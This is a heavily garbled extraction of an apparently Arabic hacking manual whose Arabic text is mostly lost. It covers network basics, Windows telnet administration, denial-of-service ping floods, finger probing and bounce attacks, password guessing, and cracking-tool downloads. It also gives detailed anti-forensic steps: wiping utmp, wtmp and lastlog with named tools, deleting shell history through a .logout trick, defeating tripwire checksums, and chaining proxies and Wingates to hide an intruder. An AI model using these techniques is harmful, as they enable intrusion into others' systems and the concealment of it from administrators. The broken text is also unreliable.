.

1
.2
.3
.4
.5
.6
.7
.8
.9
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.1
.2
.3
.4
.5
.6

.7
.8
.9
.10
.11

.20
.21
.22
.23
.24
.25
.26
.27
.28
.29
.30
.31
.32
.33
.34
.35
.36
.37

.
.
.
.
) (.
) (.
.
.
.
.
Webcrack.
MungaBunga.
.WinSmurf
Evil Ping .
.
.
.
.DNS
.Routing in the Internet
.NETBIOS
.Finger
Net .
secure shell.
Buffer Overflows.
CGI .
!.
) (.
) (.
HTTP Port !!.
NeoTrace.
.
.
) (.
) (.
.
.IIS
UniCode.
.
.
.
God Will .
.NOOP4
.
.
.
.
.
)>&<( .

.38
.39
.40
.41
.42
.43
.44
.45
.46
.47
.48
.49
.50
.51
.52
.53
.54
.55
.56
.57
.58
.59
.60
.61
.62
.63
.64
.65
.66
.67
.68
.69
.70
.71
.72
.73
.74
.75
.76
.77

CgiScaner .
.
Shadow Scan Security .
.
) (.
) (.
) (.
)(.
.htaccess
FTP.
FTP.
.SQL
SQL.
.
.
.
.
) PHP Shell (.
) PHP Shell (.
) PHP Shell (.
.anmap
.
.Cross Site Scripting
.
.
.
.
.
.
.
.Chunked
.
.vBulletin2,2,0
.
.vBulletin 2,2,9
.phpbb 2.0.0
. php nuke
.
.
.

...




.
:
.
"

"

" "

.

)) ((

...................................................................




...

..........................



.. ..
!!!
((
..


.. ..
.

" "

> <
> : <

256 ISDN



. - - (:
:


5

)) )) -

)) ))
.....



- - -

)) ))



)) ((




CSS XSS Cross Site Scripte

XSS

XSS
) ( +
:
XSS+BUG+EXPLOIT
: IIS
IIS+exploit+bug



:
:



: http://www.google.com/
: http://www.yahoo.com/ - http://www.altavista.com/
- http://www.lycos.com/ - http://hotbot.lycos.com/
)) : )) kazaa WinMX
: http://news.bbc.co.uk/hi/arabic/news http://arabic.cnn.com/ - http://www.aljazeera.net/
: http://www.securiteam.com/ http://www.securityfocus.com/ - http://www.ussrback.com/ http://www.ntbugtraq.com/ - http://www.ntsecurity.nu/ http://www.ntsecurity.com/
: http://nvidia.com/ - http://www.asus.com/ - http://drivers.online.net.nz/ - http://intel.com/ - http://www.amdmb.com/

") ) "
> <
> : <

.
. "" .


.


. ..
.
:

.
IP
.
.


.IP

.
.

Start run .winipcfg
"" "" .winipcfg
IP
IP 212.33.40.1 24.5.66.3
IP 212
IP " "
IP IP
.
(IANA(Internet Assigned Numbers Authority IP

:
-1 (ARIN (American Registry for Internet Numbers

-2 (RIPE (Rseaux IP Europens

-3 (APNIC (Asia Pasific Network Information Center
IP .
8

 IP whois IP
IP IP
http://www.ripe.net/db/whois.html
IP .
IP
IP 10.10.10.1
0 ) 255 (
IP
IP
. IP 212.26.75.34 IP
212.26.75.201 .
IP ) IP (
IP whois .
http://www.ripe.net/db/whois.html
212.26.75 search
.

Port

.
web server ftp server.

80 21
1720 .
.
DNS


.
.DNS IP ..
CNN 207.145.53.10 www.cnn.com
..
DNS IP
DNS ) IP
( www.cnn.com
DNS
... DNS
IP .
netstat

IP .

. .
.connection
Client .server
)
( ) (port )
( netstat ms-dos prompt
programs
.
)IRC) Internet Relay Chat
chat server chat client

.

.
IP
IRC chat
server


IP
) ( XXX.111.222.333
IP

.



IP
,
:
.1

10

 )
( IP .
.2 :
IP
.
)
( IP .

.

)
(
/www.networksolutions.com/cgi-bin/whois/whois
) www ( wagait.com
.
.

25

31337
1720,1503

FTP 21

SMTP

11

BackOrifice
Netmeeting

80
110
139

Chat
6667
12345,20034 NetBus

Web

POP3

12

" ) ("

.

.
.

)(

.
.
-1 ):(Viruses

.
) (
.
-2 ):(Trojans

) ( .

.
" " NetBus"
" Back Orifice " " . SubSeven


) (client
.

) (
) (CD-ROM
.

13


-3 :

.

. "
"
) (
.
"" )
(
.
!! !!
!!

14


-4 :

) ( encrypted .
) ( PWL
.
98 95
.
-5
!
.
! ICQ
.
.
.
IP

!
-6 -6 :

.
.

15

 . ) (script

! 4
.
-7 :

FTP )
(SMTP
.
.


.


.

.

" "

16

> <
><JawaDal :
>:

<z3r0

here we G0
.. dos .shell account
. it reboots . ! . !!!
/FTP ftp://hostname:
GFI LANguard network security scanner
..21 .. ..
!!
log in ftp ...cd lcd dir ls :
log in LOGS...(LOG.FILES) 1
LOG
log files ) (loged in
:


online
IP Address >>>>>>>
) host name (

screen resolution

)>>>>(ISP
3 log files:
- WTMP \ \ host tty
- UTMP Onlne
- LASLOG \
!! ) (log.files )track you
... (down
: !
<-- <----FTP-- !
. !
..
<-- <-- <--...--so on--
!! ..
-: Wingate ..
17

 Wingate .. Wingate
IP !!
1.. !
....
!! .. anonymous ..web
!!...... .spyware firewall . zone alarm
) .. (
!! windows washer
,. .. .
. how to Stay anonymous on the web how to
secure to secure my computer
.. ..
Preety Good Privacy (PGP)d ..
!
/http://www.pgpi.org :
ok !

.. ..

-1 wingate
!
tracks
: log modifier
ah-1_0b.tar clear.c cloak2.c invisible.c marryv11.c wzap.c wtmped.c
zap.c
==================================================
==========================================
. anonymous
. ..
!!!. .

" "
18

> <
>:<
.
.
.
------------------------------------------------------- -1 .
-2 .
-3 .
-4 .ACL
-5 .
:
-1.
-3.
-3 .
-4.
.

.
:
-1 .
-2 .
-3 .
-4 National
.(Security Agency (NSA
-5
ROM Boot Chip
RAM .
-6 .
-7 Permissions
.
-8 Rights .
19

 :
-1 .
-2 .

.
. .

.
Security
(Accounts Manager (SAM Workstation
Domain
SAM

20

 Access Token
:
-1 (Security Identifier (SID .
-2 Group SIDs .
-3 Privileges .
Access Token
.Remote Logon

.
:
-1 .
-2 .
-3 .
-4 .No Access
.
(Access Control List (ACL
ACL .(Access Control Entry (ACE
ACE SID

ACE ACL ACE
SID .
: ACE
-1 .AccessAllowed
-2 AccessDenied .No Access
SID SIDs ACE
ACL.
NT 2000 ACE AccessDenied ACEs
AccessAllowed ACEs SID AccessDenied ACEs
AccessAllowed ACEs
SID .
:

21

 :

.
:
-1 .
-2 .

" "

22

><
><BeReal :



. .
===========================================================
==========
) -:(Telnet .
.
.

) (21
Anonymous Mode .
Start ==> Run ==> telnet .
------------------------------------------------------------------------

-:Scanner

) (Exploits
.
Shadow Security Scanner Stealth Omran Fast
Scanner .

IIS
CGI .
23

-----------------------------------------------------------------------

) -:(Exploits .
URL

. Buffer Over Flow Exploits
CGI Exploits CGI Bugs
Unicodes Exploits Buffer Over Flow Exploits
PHP Exploits DOS Exploits

. Fire Wall
). (c.




. ) (
Borland C++ Compiler .
----------------------------------------------------------------------

-:FireWall
.
) (
.
----------------------------------------------------------------------

24

 -:Token ) (Shadowed Passwd

* x . Shadowed
. Shadow file
. etc/shadow/
----------------------------------------------------------------------

-:Anonymouse
.
.
----------------------------------------------------------------------

-:Valnerableties

.
Valnerable (:
.

Security Focus .
----------------------------------------------------------------------

: passwd file
. .
--------------------------------------------------------------------- : root

25

 .

.
--------------------------------------------------------------------- :Server

24
24 . (:
.



- . . -
---------------------------------------------------------------------- ) : ( Buffer over Flow


- -
.
- DOS -
.

" "
:::

26


.

.
.

" " Webcrack

> <

27

> :<

....

...

28

29


http://www.dunbell.freeserve.co.uk/webcrack40.zip

" MungaBunga "

30

><
>< KING HAKER :
:
MUNGA BUNGA

:
-1
-2
-3
-4
-5 ) (
-6


:

1
2 BROWSE
3 BROWSE )
.....(
4
31

 5 ) (
6
7
8
9
10

11 6
12
13 ) (
14


:
http://koti.mbnet.fi/hypnosis/caliberx/cracking.htm

" " WinSmurf

> <

32

> :<
..
winsmurf
Scree Shot
--------------------------------------------------------------

-------------------------------------------------------------*** winsmurf ***

txt
Kb 10
winsmurf
...
..
http://www.planet-eagle.de/files/WSmurf.zip

" Evil Ping "

> <

33

. 200
.

" "
> <
34

 , , :

35

, :

36

 :
:
..
http://www.geocities.com/boom_q8y4/dorrah.zip

" "
> : <

37


...
::
"" ===<== :
Ping www.xx.com
:Xxx
.
:
) ( ) ( ) I-( ping -n
:
ping -n 1000 -l 400 www.xxx.com
::
...
:
ping -t ip
ip .

" "
> <

38





2000


63
Telnet Authentication
You can use your local Windows 2000 user name and password or
domain account information to access the Telnet server. The security
scheme is integrated into Windows 2000 security. If you do not use the
NT LAN Manager (NTLM) authentication option, the user name and
password are sent to the Telnet server as plain text.s 2000 security
context for authentication and the user is not prompted for a user
If you are using NTLM authentication, the client uses the Windowname
.and password. The user name and password are encrypted

NTLM

If the User Must Change Password At Next Logon option is set for a
user, the user cannot log on to the Telnet service when NTLM
authentication is used. The user must log on to the server directly and
.change the password, and then log on through the Telnet client

NTLM

In a Windows 2000 Server default installation, the Telnet service is set to
manual startup. You can use the Services snap-in or the Computer
Management snap-in to start, stop, or configure the Telnet service for
2000 .automatic startup
Services

39


In the Computer Management snap-in, Telnet is a service located under
the Services and Applications node. Select Services from the console
.tree, and then select Telnet from the list of services in the details pane

You can also start or stop the Telnet service from a command prompt.
To start Telnet Server, type net start tlntsvr or net start telnet at the
command prompt, and then press Enter. To stop Telnet Server, type net
stop tlntsvr or net stop telnet at the command prompt, and then press
.Enter
Telnet Server Admin
You can use the Telnet Server Admin utility to start, stop, or get
information about Telnet Server. You can also use it to get a list of
current users, terminate a user's session, or change Telnet Server
Telnet Server Admin .registry settings


Telnet Administration Tool , Telnet Server Admin
.OK ,tlntadmn ,Run ,Start Administrative Tools
.(Adminpak.msi) , Telnet Server Admin
Telnet Server Administration

Telnet Server Admin

Quit this
application

List the current

users

Terminate a user
session

Display/change
registry settings

Start the service

Stop the service

40

Invalid input

Failed to open the

registry key

Failed to query the

registry value

You can use Microsoft Telnet Client to connect to a remote computer

running the Telnet service or other Telnet server software. Once you
have made this connection, you can communicate with the Telnet
server. The type of session you conduct depends on how the Telnet
software is configured. Communication, games, system administration,
.and local logon simulations are some typical uses of Telnet
The Telnet client uses the Telnet protocol, part of the TCP/IP suite of
protocols, to connect to a remote computer over a network. The Telnet
client software allows a computer to connect to a remote server. You
can use the Telnet client provided with Windows 2000 to connect to a
remote computer, log on to the remote computer, and interact with it as
.if you were sitting in front of it
Users of previous versions of Microsoft's Telnet client may notice a few
changes in the version included with Windows 2000. The most obvious
change is that Microsoft Telnet Client is now a command-line
application rather than a Windows application. As a command-line
application, Microsoft Telnet Client will seem very familiar to users of
.UNIX-based Telnet clients
An important new feature found in Microsoft Telnet Client is NTLM
authentication support. Using this feature, a computer using Microsoft
Telnet Client can log on to a Windows 2000 computer running the Telnet
.service by using NTLM authentication

. telnet .telnet ,Run ,Start ,Telnet
TCP/IP

To display help for Telnet, type help at the Microsoft Telnet command
prompt. To connect to a site, type open <computer_name> where
<computer_name> is the IP address or host name of the computer
.running the Telnet service

41



Hishem1 Hishem2
Hishem2 Hishem1 Hishem2
Hishem1
Hishem1 Administrator
, Start ,Programs Administrative Tools .Services
Services
.Telnet
(The Telnet Properties (Local Computer
Startup Type Manual .Automatic
,Service status . Start
OK )Local Computer) Telnet properties
. Services

Hishem1 Hishem2

, Start .Run
telnet .OK

help ?

open Hishem2

42


o open
Hishem2
Hishem2

Hishme2 Hishem1

, Start .Run
tlntadmn .OK
Telnet Server Admin
1
NOR IP

43


1 1

Hishem1

Start Run Telnet pop.mail.yahoo.com 110

user
user xxxx
pass pass xxxx
Ok

List

44

 dele
pop




[open [\\RemoteServer] [Port

\\ RemoteServer
. .
Port
. .

.o

Redmond 44:
o redmond 44

Telnet

[close [\\RemoteServer

45

\\ RemoteServer
. .

.c

Redmond:
c redmond 44

Telnet

[?] [send [\\RemoteServer] [ao] [ayt] [esc] [ip] [synch

\\ RemoteServer
. .
ao
.
ayt
"."?Are you there
esc
.
ip
.
synch
.Telnet

Telnet
46


display

display .Telnet ) Telnet

(Telnet Telnet

.[+CTRL Telnet .ENTER

tlntadmn
Telnet

[tlntadmn [\\RemoteServer] [start] [stop] [pause] [continue

\\ RemoteServer
. .
start
.Telnet
stop
.Telnet
pause
.Telnet
continue
.Telnet

Telnet tlntadmn
2000 .2000
47

 tlntadmn Windows 2000 Telnet

.
Windows XP
Telnet

[tlntadmn [\\RemoteServer] config [maxconn=PositiveInteger

\\ RemoteServer
. .
maxconn=PositiveInteger
. 10
.

Telnet

[tlntadmn [\\RemoteServer] config [maxfail=PositiveInteger

\\ RemoteServer
. .
maxfail=PositiveInteger
.
.100

Telnet

[tlntadmn [\\RemoteServer] config [timeout=hh:mm:ss

\\ RemoteServer
48

 . .
timeout=hh:mm:ss
.
? / ..

" " DNS

> <
>< Dark Devil :
:

.....

C
:


:
:DNS
:

==================================================
=========================
?DNS

49

==============
DNS : . Domain Name System DNS
53 DNS
53 translates alphabetical hostnames
/http://www.burn.com : IP ADRESSES 127.0.0.1


address resolution IP

DNS . address resolution DNS

). (IP
address resolution DNS
HOST FILE
IP Stanford Research Institute's
.(Network Information Center (SRI-NIC
) (UPDATE

FTP .SRI-NIC


DNS .
DNS decentralized
DNS DNS
DNS
.
DNS
.
:THE DNS SERVER
================
DNS SERVER UNIX
BIND ) .(Berkeley Internet Name Domain

DNS SERVER . UNIX
DNS :
(the name server itself (the daemon program that listens to port 53
RESOLVER
NAME SERVER

/http://www.burn.com DNS )
( IP /http://www.burn.com
IP
.
daemon program
.
:THE TREE INFORMATION
======================
IP DNS

50

 DNS SERVER

.DNS SERVERS

:
ISP isp.co.uk
ISP's DNS server's
hostname dns.isp.co.uk DNS IP
/http://www.burn.com dns.isp.co.uk
DNS
SERVER
dns.isp.co.uk some-organization.org.uk school.edu.uk,
university.ac.uk, england.gov.uk, airforce.mil.uk
UK
DNS ROOT IP
.DOMAIN NAME
?When and why does DNS "hang" or fail
======================================
DNS . ISP IP
.
DNS 15 .
address could not be found
HOST IP
DNS . TIMED OUT
REFRESH RELOAD .





SSL
.

51

" " Routing in the Internet

> <
>< Dark Devil :
:

.Routing
:
:Routing in the Internet
=========================
!?what is routing

.
:
Physical Address Determination-1
Selection of inter-network gateways-2
Symbolic and Numeric Addresses-3

52

 ip .
ip
.
)inclusion of a
.(local network address or physical address within the frame

local networks .gateways
, routers
. ip routing
.
address translation

/http://www.burn.com ip
) DNS DNS (.
Physical Address :
:Physical Address Determination
===============================
ip data
.
physical address .
ip , physical addresses ip
.

ip physical addresses ARP
Address Resolution Protocol
ip , physical addresses ARP
. cache
arp -a .
:
C:\WINDOWS>arp -a
Interface: 62.135.9.102 on Interface 0x2
Internet Address Physical Address Type
dynamic 20-53-52-43-00-00 207.46.226.17
dynamic 20-53-52-43-00-00 213.131.64.2
dynamic 20-53-52-43-00-00 213.131.65.238

Physical Address
Physical Address Mac Address
Physical Address
ip Physical Address
router .
type dynamic
.

53

 static " "

routers

" " NETBIOS

> <

SNMP

NetBIOS
NetBIOS API 139 TCP

NT
NetBIOS TCP/IP
Advanced WINS

54

 RestrictAnonymous

Administrative TOOLS Local Security
policy Local poicies security options Additional restrictions
for anonymous connections security No Access
Without Explicit Anonymous Permissions

NetBIOS

Net View

NT/W2000
IP

Net
.
Nbtscan
...
...
Legion

55

 TCP UDP 135

445+ 139
NetBIOS SNMP
2000

Public
public Remove Send authentication trap

regedit
HKEY_LOCAL_MACHINE\system\currentControlset\serveces\SNMP\parameters\ExtensionAgent
=
LANManagerMIB2Agent
2

TCP/IP NetBIOS

56

" "Finger
> <
><LAMeR :

Finger 79


>================<
1.1
1.2 Finger
1.3 Finger
1.4 Finger
1.5 Finger
1.6
1.7

1.1:
>=========<

.
1.2 Finger
>===================<
Finger 79

businesscard .
) ( remote user Finger
) Finger (79 .

.

57

 , ) (admin
.

Finger
. Finger
.
Finger

) ( Finger Deamon " " !Finger me " ! "
Finger

) (bisinesscard

Finger Deamon

) ( .

.
portscans . . .
Finger

.

Finger
: Finger
.
:) ( server
1.3 Finger
>=================<
) ( superscan
) ( /http://www.foobar.com ) Port( 79
/http://www.foobar.com
Finger .
) (request

) (client Finger ) ( installed
Telnet Finger
---Telnet(client) --------request-------> Finger Deamon(in Server) o
): ( MS DOS
telnet http://www.foobar.com/ 79

58

 telnet .

)(client Finger
Deamon
.
:::

"@" " "www
:
finger@anyname.com
:
/finger http://www.anyname.com
finger www
) : ( unix shell
finger@foobar.com
) (
/http://www.foobar.com
:
:Login: Name: Tty: Idle: When: Where
root foobar sys console 17d Tue 10:13 node0ls3.foobar.com
<.......> <.......> <.......> Amos Amanda
Anderson Kenneth
Bright Adrian
Doe John
<.......> <.......> <.......> Johnson Peter
Mitnick Kevin
Munson Greg
Orwell Dennis

) ( login )" (Name "
.
)(Tty the terminal type
) (Idle .the idle time

.
..
) Johnson Peter

59

 ( :
finger johnson@foobar.com

1.4 Finger
> =========================
===========<
.Finger
Finger deamon .
) ( % 50
/ )(Access .
bruteforce
worldist password cracker


/http://www.thehackerschoice.com
VLAD's pwscan.pl
) word (

- bruteforce
-
.
) (Admin ) (root
. .
.
:
finger secret@foobar.com
Finger Deamon
" "secret .
" "test " "temp ""0000
" "secret
.
finger .@foobar.com
finger 0@foobar.com
!
Finger Deamon RFC !

1.5 Finger
> =========================

60

=============<
) Finger Finger "" ""(
""www.victim.com
" "www.host.com Finger
): (
finger@host.com@victim.com
Host.com ) (Finger victim.com .
victim.com
/http://www.victim.com
) (log /http://www.host.com .
) Host( ) ( Finger

Finger

Finger .
:
!.
1.6
>=======================<
Finger Deamon
) ( access .
Finger deamon
.access

wordlist .bruteforce
" " .Finger deamon

61

" " NET

> <
.net
net :
net ? net /
.
net
net help command .
net accounts :
net help accounts
net ) /y( ) /n( .
net stop server
net stop server /y
.

) .("Service Name " net
:logon
"net start "net logon

unlimited 49,710( 90.

62

63

64

net file /cl . net file :

65

 )*(.

66

67

 ) .(Sales\Ralphr

68

" "secure shell

> <
><ACID BURN_EG :
:

Secure Shell :: SSh
69

 ::
SSh
===============
secure shell )(
remotely connection

)rlogin,rsh and
.(rcp
secure shell tcp .

:: ::
secure shell r- commands
==================================================
======================================

======================
* BSD r- commands )
(rlogin,rsh and rcp
) (root access


unauthorized access to systems


:
(


ssh

. authorized access to systems




secure shell
) (
::
ssh

70

===========================================
-1 ip spoofing
ssh
ssh . localy
-2 DNS spoofing
-3
-4
ssh
ssh disconnected
.

ssh )three-key triple-DES, DES, RC4-128,
(TSS, Blowfish
" encryption of type "none !
ssh ,
ip spoofing DNS spoofing
.



.

" "Buffer Overflows

> <
><LAMeR :
.. Buffer Overflows

71

 :
-1 Buffer Overflow
<--------------------------
-2)(Proccess
<-----------------
-3 )(Memory management
<--------------------------------
-4 Buffer Overflow
<----------------------------------
*


-1 Buffer Overflow
<>-----------------------
Buffer Overflow .
Buffer Overflow ' 'code red
IIS - MS web server-
Buffer Overflow ) 20
.
(
:
" : " :
) ( .
15
) ( 25 )
(.
15 " "Overflow
.

:

><var1><var2><vname><Other things in memory
10b 6b 15b
) var 1 var 2 vname, 15
(
" abcabcabcabcabcabcabcabca
"bc :
somevalue2avalusabcabcabc
abcabcabcabcabcabc
><var1 ><var2><vname ><other things go here
" vname "overflowed

72

 " other things in memory " )(overflow

.


.
linux .
-2):(Proccess
<>----------------
).(Proccess

.

" "Multi- proccesses ...
) (CPU

.. (:
.
:

-3 ):(Memory management
<>------------------------------
-operating systems- )virtual memory(.
) ( .
Operating System "
)(" .
) OS (
.

)(
) (
) (
.
.:

) (
) (
) (

)( .
-4 Buffer Overflow
<>---------------------------------

73

 ) (Root
)(
) (overflow

.
: )( )
(
)( .

Buffer Overflows Buffer Overflows
.
Buffer Overflow
.

" CGI "

><
> <King_abdo :
CGI

74

) (1 CGI

CGI=COMMON GATEWAY INTERFACE

)(HTTP

TCP/IP .

) 80 (

-1
-2

75

GET -1
POST -2
PUT -3

) (2

HTTP

. FTP .TELNET

" !"
> <
> :<
:
==========
..

..
..
76

 ..

.. .. ..
log files
.. ! !!
..
************************
) ( exploites
" "
) ( 0day ..
!!
!!
!!
..
hacker

..
************************
8 :
=================
: ) (
: **" " Paranoid
:
" " Paraniod " " Paranoid !** ..
.
: )
(
LoGs : ) (
lOGs .. syslog configuration and logfile Admins checksum checking software :
:

77

 :
: ........ !!! ...
************************
:
=======
:*************
.. ..

) ( Hacker ..
) (

" " Paranoid***************************
" " Paranoia )
(
..
paraniod :

!!
.. ..
..

!!

.. .. ... .. ..
) (
.. !!
!
.. )
( .. .. ..
!!
..


log
hacker .. % 100
" " Paranoid*********************
" " Paranoid
...
) (
... ..
..
.. ) (

78

 ..

!


!******************************************
..
: !!!!

:=========
******
..

:***********
SysAdmin ..

(= hacker
.. ..

) (
>--
<- sensitive data
..
:
MsDos SFS v.17 SecureDrive 1.4b *Amiga * ) EnigmaII v1.5 (
Unix CFS v1.33 ) ( ) ( :
Triple DES IDEA (Blowfish (32 rounds file2file :

79

 PGP v2.6.x ) Unix System (

:
SSH DES Login .. .. .. ..

.. )
8- 4 ( 8
.. )
( ..
!!
CD HD

.. document files

!!
:
=================
: , ,

:
!! keyborad ..
!!! !! !!!
...
" "
!!!

:
===================
\\\ :
..
telnet security .. !!!! .. ==< >----
: LoGS
============

80

 3 :
WTMP ) ( log on/off - log in/logout + tty + host UTMP ! LASTLOG logins** ) (
telnet , ftp , rlogin ..
:
!! .. % 99.9 ) .. (
logfiles
.. ..
..

:

ZAP (or ZAP2

..
root ) log files (
) default (
UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log
$home/.lastlog
:
=======
.. !!!

tmp and $HOME/
Shell History $HOME :
: History files
sh : .sh_history
csh : .history
ksh : .sh_history
bash: .bash_history
zsh : .history
: Backup Files
~* ,dead.letter, *.bak
: History files
mv .logout save.1
echo rm -rf .history>.logout
echo rm -rf .logout>>.logout
echo mv save.1 .logout>>.logout

81

 ======================
encrypted partition
) (
admin
..

..
.. shells
background !!!
parametres ...
telnet http://www.host.com/ 23 :

telnet
open
/http://www.host.com
..
backdoors )
sub7 (
:
===============================
*******
sniffer ..
:
**********************
) ( hacker ...
!!!

...
* ) ( ) ( admin
) (
output sniffer
netstat online
!! GateWay Server
* A gateway server in between

wtmp and lastlogs
gateway server
..
.. gateway server
..
==< ) root access (
Dialup server ..
(= hacked system
: dialup hacking

82

 server
) ( )
( dialup servers !
:

lOGs ..**************************************************
***
..
:
- 1 : LSOF List Open
Files
- 2 ) ( -
touch /tmp/check ""find / -newer /tmp/check -print
: <- <- <-
log files /usr/adm /var/adm /var/log
loghost xx@loghost ..
loghost
logfiles text editor
wc 10 "head -LineNumbersMinus10" :
) 10( head -
accouting acct-cleaner from
zhart
wtmpx utmpx !!!
.. ) ( =(
syslog configuration and logfile************************************
syslog function ..
syslog
logs hosts ...
hosts
syslog /etc/syslog.conf

83

 ******************************
.
cron /var/spool/cron/crontabs
. Root .

"."crontab -l root
. ~/bin
. sinnefer .

,tiger, cops, spi, tripwire, l5
.binaudit, hobgoblin, s3 etc
,

, :
) (
back door Admins****************************
, .
:
forword. alias sulog su root group ) admin, root,wheel, etc
passwd , . ) ,
chid.c, changeid.c ( .
history/.sh_history/.bash_history ,
, . .
profile/.login/.bash_profile alias ,
. ,

checksum checking software
************************
) checksum .
(






checksum

84

SOFTWARE : STANDARD PATH : BINARY FILENAMES

tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire
binaudit : /usr/local/adm/audit : auditscan
hobgoblin : ~user/bin : hobgoblin
raudit : ~user/bin : raudit.pl
l5 : compile directory : l5

NTFS checksum
) CD ( ...


) ( ..

- 1
"."tripwire -update /bin/target
- 2
) checksum
(
*******************
) ( ..
admins
startup profile, .cshrc, .login, .logout .
) (

:
=========

***************************
) ( administrators
) (
: administrators hacker ==< ...
) admins hacker
administrator administrator (
..
..
..
..
) ( ..
..
..

85


:
=========
:
**************************************************
**************
: !!!! : ..
..
) (
..

: !!! :
.. ..
) (
..
!




:
========
:
******************************
Change - Changes fields of the logfile to anything you want
Delete - Deletes, cuts out the entries you want
Edit - real Editor for the logfile
.Overwrite - just Overwrites the entries with zero-value bytes
!Don't use such software (f.e. zap) - it can be detected
--------------------------------------------------------------LOG MODIFIER
++++++++++
ah-1_0b.tar Changes the entries of accounting information
clear.c Deletes entries in utmp, wtmp, lastlog and wtmpx
cloak2.c Changes the entries in utmp, wtmp and lastlog
invisible.c Overwrites utmp, wtmp and lastlog with predefines values, so
! it's better than zap. Watch out, there are numerous inv*.c
!marryv11.c Edit utmp, wtmp, lastlog and accounting data - best
wzap.c Deletes entries in wtmp
wtmped.c Deletes entries in wtmp
!zap.c Overwrites utmp, wtmp, lastlog - Don't use! Can be detected
------------------------------------------------------------------------------------- :
=========

**********

86

 .. .. !!
) (
..

" ) ( "
> <
> :<

Proxy - Sock Host - Wingate

) (-

87

++++++++++++++++++++++++++++++++++
Introduction to Proxy Server
=) proxy server: (=
) proxy server ( server
proxy server

LAN:
Local Area Network
proxy server

proxy server
/http://hackergurus.tk
proxy server proxy server
/http://hackergurus.tk
server
:...
bit )(


proxey server

lucky

!
proxy server

download #..
10
proxy server
Refresh Reload
Why use a Proxy Server
=) (=

!!!
:
ISP
Internet Service Provider

Traffic

proxy server

ip
ip


proxy port proxy server

88

 !! (..

cach.microsoft.com 80

-1
-2
-3


Logs
Introduction to Wingate
=) =(Wingate

WinGate
proxy server firewall
) Anonymously (

WinGate :
------------------------------------------------------------------------------------------dial up modem, ISDN, xDSL, cable modem, satellite connection, or even
dedicated T1 circuits
------------------------------------------------------------------------------------------wingate
, 23
. Telnet
the wingate .
wingate ) Aminstrator(
wingate ,
) Local Network (
ipspoof ICQ - Mirc .
wingate open wingates
) Admin( DIScover
!!!


WinGate
WinGate SyGate
) Logs( WinGate Server 48
) ISP's (
wingate
How do I find Wingates
=) WinGate(=
. wingate
.
WinGate Scanner
google
/http://www.google.com

89

 ip hostname
@home
:
wingates wingate NetWork
...
Unix :
Trial and Error
wingate 23

) Guest( Anonymously
Introduction to Socks Host
=) =(Socks Host
Socks Host WinGate 1080

explorer and netscape
Socks Host
Mirc ip FireWall
**********************

**********************
Ghost Surf
$$$$$$$$$$$$$$$$$$$$$$
Stealther
------------------------------------------
------------------------------------------- %100

" ) ( "
> <
> :<
...
Chaining Proxies

90

 Chaining wingates Telnet

)------------------------------------------ proxy ip Domain
.
Proxy Ip Address Domain
,,,
Proxy
:
http://www.multiproxy.org/anon_list.htm
/http://tools.rosinstrument.com/proxy
Group

P_R_O_X_Y@yahoogroups.com:



P_R_O_X_Y-subscriber@yahoogroups.com
Replay

)------------------------------------------=========================

:
/http://www.privacy.net

/http://www.proxytester.com
Ip !!!
..
=========================
*************************************
&&&&&&&&&&&&&&
proxy server
&&&&&&&&&&&&&&
Proxy (WebSite,IRC Chat,etc):


Proxy Server
...

][User]>>>>>[Proxy]>>>>>[Web Pages
---------------Proxy Chaining

91

---------------

/
][User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Destination


Destination = web page, Unix server, ftp server, etc
Proxy chaining
server telnet, ftp, or http
Chaining %100

ftp
Adminstrator Logs proxy
Chaining Proxy

Logs
Logs ...
---------------HTTP Chaining
--------------- HTTP chaining Proxy Address
:
http://proxy.magusnet.com/-_-http://www.google.com
) (-_- !!!
Chaining:
_http://proxy.server1.com/-_-http://proxy.server2.com/-http://www.destination.com

http://anon.free.anonymizer.com/http://www.google.com

) (/
http://proxy1/http://proxy2:80/proxy3:80/http://www.yahoo.com
= proxy .....
---------------Browser Chaining
--------------- Internet Explorer
----

213.234.124.23:80
213.234.124.23:

92

80:
ISP

Tools
Internet Options
Connections

Settings

) Address(
) Port(

213.234.124.23: 80:
Chaining Proixes
/
Address: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port: 80
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
&&&&&&&&&&&&&&
Wingates
&&&&&&&&&&&&&&
Wingate proxy server
)) 23 Telnet ((
Wingates online
Admin
wingate !!!!
ip 23 Telnet

WinScan
Wingate

93

Download
------------------------------Chaining Wingates Using Telnet
------------------------------ Wingate
DoS Telnet .....
wingate 23
Telnet

61.133.119.130 23
Telnet:
C:\WINDOWS>telnet 61.133.119.130 23


Wingate> 203.207.173.166 23

Wingate> 213.17.99.45 23

Wingate> 10.65.212.7 23
94

 wingate
WinGate>arbornet.org

C:\Windows> telnet 61.133.119.130 23
Wingate>203.207.173.166 23
Wingate>135.245.18.167 23
Wingate>m-net.arbornet.org
Connecting to host arbornet.org...Connected

95

" "Logs
> <
> : <

.
. Unix Multi-User Mode .
. Operation ) ( Linux ) . ( Unix
Unix
:
.

....
: ( LOG File ) ...
: ... ....

IP
........


Microsoft
Windows Linux Mac
....

96

 ..
: ...
) . ( LOG File .

) (Web servers

) (log files .
.
) (log file
.


.

- -
:
...
...

97

. WIN NT
...

:
) ( ) (
...
... ..

...
. :
lastlogin.
.
.
bash_history.

contactemail.


Tmp trash. . etc
.
lastlogin & .bash_history.
rm bash_history.
:
rm .bash_history
rm .bash_history
lastlogin. .
....
cpanel .
..
localhost :
...

:
....

98


...
...
...
...
: ... ....
..
.. ) ( HTTP Protocol


HTTP .... . SOCKS Protocol
.
.
Web Proxy Service (1 . HTTP Protocol .
WinSock Proxy Service (2 windows NT
telnet FTP WinSock
...... Protocol
. Socks Proxy Service (3 )SSL) Secure Sockets
Layers ) IIS) Internet Information Server Windows NT
FTP Telnet GopherIRC RealAudio POP3
firewall ... securiy .
..... TCP/IP
:
* )(Internationa Organization for Standardization
** . ransmission Control .
... Protocol TC

... :
Ping Traceroute, DNS lookup, Finger, Whois, LDAP, SNMP
... WIN NT : TCP/IP
...
UNIX Router .


... .
) . ( Router : .
.

99

 .... ... .
. ...
... . :
Port 21 = FTP
Port 23 = Telnet
Port 25 = SMTP
